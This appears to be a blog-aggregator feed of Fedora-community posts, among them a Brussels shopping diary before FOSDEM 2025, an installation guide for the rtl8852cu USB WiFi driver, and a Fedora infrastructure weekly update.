Planning for the datacenter move is moving along. I've been working on internal documents around the stuff that will be shipped after we move, and next week I am hoping to start a detailed plan for the logical migration itself. It's a pretty short timeline, but I am hoping it will all go smoothly in the end. We definitely will be in a better place with better hardware once we are done, so I am looking forward to that.

comments? additions? reactions?

As always, comment on mastodon: https://fosstodon.org/@nirik/113969409712070764

Shopping Spree Before FOSDEM 2025

Posted by Akashdeep Dhar on 2025-02-07 18:30:50 UTC

The decision to arrive in Brussels a day before the FOSDEM 2025 fringe events began was a smart one as that not only allowed me to catch up on some sleep due to the major timezone shift I faced but also to connect with my fellow community members. While the jet lag did not hurt me as badly as it did the last few times I have been to Europe, I did find myself waking up a little earlier, at around 0500am Central European Time. After getting through some physical exercise in the morning routine, Sumantro Mukherjee got in touch with me to hatch some plans for exploring Brussels and purchasing goodies. We made it to the dining place around the reception area of the Moxy Brussels City Center hotel at around 0830am Central European Time to have our meal, which mostly consisted of Oatmeal Bars, Golden Hashbrowns, Chicken Sausage, Scrambled Eggs and Apple Juice.

Light breakfast at Moxy Brussels City Center consisting of Oatmeal Bars, Golden Hashbrowns, Chicken Sausage, Scrambled Eggs and Apple Juice

Even though we were through with our breakfast by around 0900am Central European Time, we realized that most locations would not open before 1000am, and therefore, I decided to head back to my hotel room after waiting for Justin W. Flory for a while. I headed back down at around 0945am Central European Time, and with me gifting Justin a small bag of Vakadwadi snacks that he loved and sharing some conversation around the Fedora Mindshare revamp - Sumantro and I headed out on a shopping spree. Our first stop was a Kiko Milano outlet, where he made a couple of purchases for his wife before we crossed the road to make it to the ICI Paris XL outlet. After purchasing a couple of incense from there for my family members, we decided to head to a Primark store to pick up some clothes - only to find that we were probably one of their earliest customers.

Admittedly, we ended up picking up quite a lot of things from there, which made me wonder just how we would be able to carry them all back on our return trip. Sumantro was in constant touch with Saheli Das Mukherjee while I was connected with my uncle and my mother over call to ensure that we made some well-informed decisions on apparel sizes. We joined the queue one after the other once we were through with making our choices, and we decided that it would be for the best if we were to head back to the hotel to drop these things before we continued with further exploration. On our way out, we headed into a nearby video game store where we looked into a bunch of retro consoles, arcade cabinets and action figurines while discussing whether Sumantro should purchase an archaic Nintendo Game Boy Color and searching for some Genshin Impact official merchandise.

At around 1230pm Central European Time, we headed into an optometrist shop as Sumantro wanted to make a purchase of some shades from the acclaimed Versace brand as a gift for his wife. We headed into another video game store located beside the previous store, where we explored some more arcade cabinets, videogame cartridges, anime merchandise and archaic computers. We were sure that we were not going to make a purchase here anyway, so we decided to depart from there after obtaining a couple of energy drinks imported from Japan. In another computer peripheral store, Sumantro and I explored some transistor radios and feature phones that were going out of fashion swiftly before we realized that it was around time for us to head for lunch. Even though we initially planned to visit the Tintin store, we decided against it due to the lack of interest.

We found ourselves heading into a Belchicken joint at around 0200pm Central European Time, and after I made one more purchase of a trenchcoat from a UNIQLO store, we decided to get a couple of takeaways. We elected a no-brainer combo of some Chicken Tenders and French Fries with Garlic Sauce and decided to have our food together in my hotel room #610. Sumantro left at around 0300pm Central European Time after we were through with the lunch for his hotel room as he wanted to prepare for his Fedora Mindshare part of the Fedora Council meeting that was going to happen in an hour from then. I decided to catch up on some more of the rest before joining the Fedora Council meeting remotely with other folks from the Red Hat Community Linux Engineering team, represented by Brendan Conoboy and those from the Fedora Council and CentOS Board.

In the evening, Sumantro made some impromptu plans to throw me a birthday party in the evening - which surely came as a welcome surprise to me. Among my thankful declination and his brotherly insistence, I had to give in, and we decided to leave from Moxy Brussels City Center hotel for Delirium Village at around 0600pm Central European Time. On our way out of the hotel, we ran into Matthew Miller and Luis Bazan, who were returning from their rental workspace - with whom we shared some conversations before we were on our way again. The weather was on the drizzlier side, and while we thought that it would get better in some time, we were soon proven wrong as we kept proceeding closer to the Grand Place. The Decathlon Forclaz jacket proved to be useful when the rain took a turn for the worse, and we had to stay moving constantly to ensure that we were not drenched.

After clicking a bunch of photographs around an absurdly vacant Grand Place square, we went through a row of memorabilia souvenir shops and luxury chocolate shops. While I could resist the temptation of making purchases from there as this was not my first time in Brussels, I could not help myself when I came across a conveniently tucked away Manga Cafe store when Sumantro and I were seeking shelter from the rain. The only reason why we could make it out was because of the distinctive Pikachu plushie and some Spy X Family posters visible from outside of the shop. Unlike the couple of shops that we visited earlier that day, this seemed like the place where we could find exactly what we were looking for - with the catch being that most merchandise available here, including the Genshin Impact Official Artbook, was localised to French, which was not helpful to me.

They had the entire manga collection of Horimiya (2021), which I would have purchased immediately had it been in English, but I did understand the reason why they were so. After spending almost an hour exploring the store until closing time of the store - I decided to get myself one unit of Kimetsu No Yaiba themed Sakuma Drops and three Gacha Boxes of metal plates with Spy X Family themed backgrounds. After clumsily dropping the cutter that I borrowed from the store receptionist a couple of times, I was finally able to pull plates with Loid Forger, Anya Forger and Yor Forger from the three boxes that I purchased. I wanted to buy out the entire stock to ensure that I ended up getting one of each kind possible from Spy X Family Code White (2023), but I decided not to go all out because that was most likely what the merchandise makers wanted us to do anyway.

Sumantro purchased a Daruma Doll after I dropped a lore about what they are about and a reference to those from the popular anime Doraemon (1979), and we departed from the store at around 0800pm Central European Time. We ordered a couple of beers when we made it into the hustle and bustle of the Delirium Cafe, and I decided to keep mine non-alcoholic to ensure that I was on top of my hydration game. The vibes within the Delirium Village were amazing, but as it was growing colder, we headed to The Belgian Fries Co. outlet for dinner once we were done with our drinks. We departed from the restaurant around an hour later for the hotel on foot, with me taking care of the navigation this time. We walked swiftly back to the hotel to ensure that we had enough resting time and woke up healthy to participate and assist with the CentOS Connect 2025 event the next day.

Linux Driver for RTL8832CU and RTL8852CU USB WiFi Adapters

Posted by Piju 9M2PJU on 2025-02-07 18:11:28 UTC

The rtl8852cu Linux driver (version 1.19.2.1, updated as of May 10, 2024) supports USB WiFi adapters based on the RTL8832CU and RTL8852CU chipsets. While Realtek continues to develop this out-of-kernel driver, it is important to note that it is not fully compliant with Linux Wireless Standards. This makes it more suitable for specialized use cases, such as embedded systems, rather than general desktop or server environments.

For most users, adapters with in-kernel drivers are recommended due to their stability and ease of use. However, if you’re working with an adapter supported by this driver, here’s everything you need to know.


Key Features of the rtl8852cu Driver

  • WiFi Standards: IEEE 802.11 b/g/n/ac/ax (WiFi 6)
  • Security Protocols:
      • WEP, WPA TKIP, WPA2 AES/Mixed mode (PSK and TLS)
      • WPA3-SAE R2
      • WPS (PIN and PBC methods)
  • Modes Supported:
      • Client mode
      • AP mode (with DFS channel support)
      • P2P-client and P2P-GO
      • IBSS (not tested)
  • Advanced Features:
      • Miracast
      • WiFi-Direct
      • Wake on WLAN
      • VHT and HE control (supports 160 MHz channel width in AP mode)

Note: Monitor mode is not supported. If you require monitor mode, consider adapters based on the mt7610u, mt7612u, or mt7921au chipsets.


Compatible Devices and Chipsets

This driver supports a variety of USB WiFi adapters, including:

  • Edup AX5400 EP-AX1671 (single-state, no onboard Windows driver)
  • Brostrend AX8
  • TP-Link Archer TX50UH V1
  • TP-Link Archer TXE70UH(EU) V1
  • MSI AXE5400

Warning: Multi-state adapters (those with internal Windows drivers) may cause issues on Linux. For better compatibility, opt for single-state and single-function adapters. Avoid multi-function adapters (e.g., those combining WiFi and Bluetooth).


Supported CPU Architectures and Kernels

  • CPU Architectures:
      • x86, i386, i686
      • x86-64, amd64
      • armv6l, armv7l (arm)
      • aarch64 (arm64)
  • Kernel Versions:
      • Officially tested: 5.4 to 6.6 (Realtek)
      • Community-supported: 6.7 to 6.12

Tested Compilers: gcc 12, 13, and 14.


Installation Guide

Prerequisites

Before installing the driver, ensure your system is up-to-date and has the necessary development tools installed. You’ll also need internet access during installation.

  1. Update Your System:
      • For Debian-based distributions (e.g., Ubuntu, Kali):
            sudo apt update && sudo apt upgrade
      • For Arch-based distributions (e.g., Manjaro):
            sudo pacman -Syu
      • For Fedora:
            sudo dnf upgrade
  2. Install Required Packages:
      • Mandatory packages: gcc, make, bc, kernel-headers, build-essential, git
      • Highly recommended: dkms, rfkill, iw, ip
      • For Secure Boot: openssl, sign-file, mokutil
     Example for Ubuntu:
         sudo apt install -y build-essential dkms git iw
  3. Download and Install the Driver:
         git clone https://github.com/morrownr/rtl8852cu-20240510.git
         cd rtl8852cu-20240510
         sudo ./install-driver.sh
  4. Reboot Your System:
     After installation, reboot to ensure the driver loads correctly:
         sudo reboot

Troubleshooting Tips

  • Conflicting Drivers: Installing multiple out-of-kernel drivers for the same hardware can cause issues. Use sudo dkms status to check for conflicts.
  • Secure Boot: If Secure Boot is enabled, follow the instructions in the FAQ to enroll the signing key.
  • Manual Installation: If DKMS is unavailable, you can manually compile and install the driver using:
        make clean
        make -j$(nproc)
        sudo make install
        sudo reboot

Recommended Router/AP Settings

To optimize your WiFi performance:

  1. Security: Use WPA2-AES or WPA3. Avoid mixed modes like WPA/WPA2.
  2. Channel Width:
      • 2.4 GHz: Set to 20 MHz fixed width.
      • 5 GHz: Use channels 36–48 or 149–165 for compatibility.
  3. Network Names: Avoid naming all bands (2.4 GHz, 5 GHz, 6 GHz) the same.
  4. Router Placement: Position the router centrally, elevated, and away from walls.

Final Notes

While this driver provides robust support for RTL8832CU and RTL8852CU adapters, it is not without limitations. Users should weigh the trade-offs between stability, compatibility, and advanced features when choosing a WiFi adapter. For most desktop and server users, in-kernel drivers remain the best choice.

If you encounter issues or have questions, consult the FAQ or open an issue on the GitHub repository.

Happy networking! 🚀

The post Linux Driver for RTL8832CU and RTL8852CU USB WiFi Adapters appeared first on Hamradio.my - Amateur Radio, Tech Insights and Product Reviews by 9M2PJU.

Infra and RelEng Update – Week 6

Posted by Fedora Community Blog on 2025-02-07 10:00:00 UTC

This is a weekly report from the I&R (Infrastructure & Release Engineering) Team. We provide both an infographic and a text version of the weekly report. If you just want to quickly look at what we did, just look at the infographic. If you are interested in more in-depth details, look below the infographic.

Week: 03 – 07 February 2025

Infrastructure & Release Engineering

The purpose of this team is to take care of day to day business regarding CentOS and Fedora Infrastructure and Fedora release engineering work.
It’s responsible for services running in Fedora and CentOS infrastructure and preparing things for the new Fedora release (mirrors, mass branching, new namespaces etc.).

List of planned/in-progress issues

Fedora Infra

CentOS Infra including CentOS CI

Release Engineering

If you have any questions or feedback, please respond to this report or contact us on #redhat-cpe channel on matrix.

The post Infra and RelEng Update – Week 6 appeared first on Fedora Community Blog.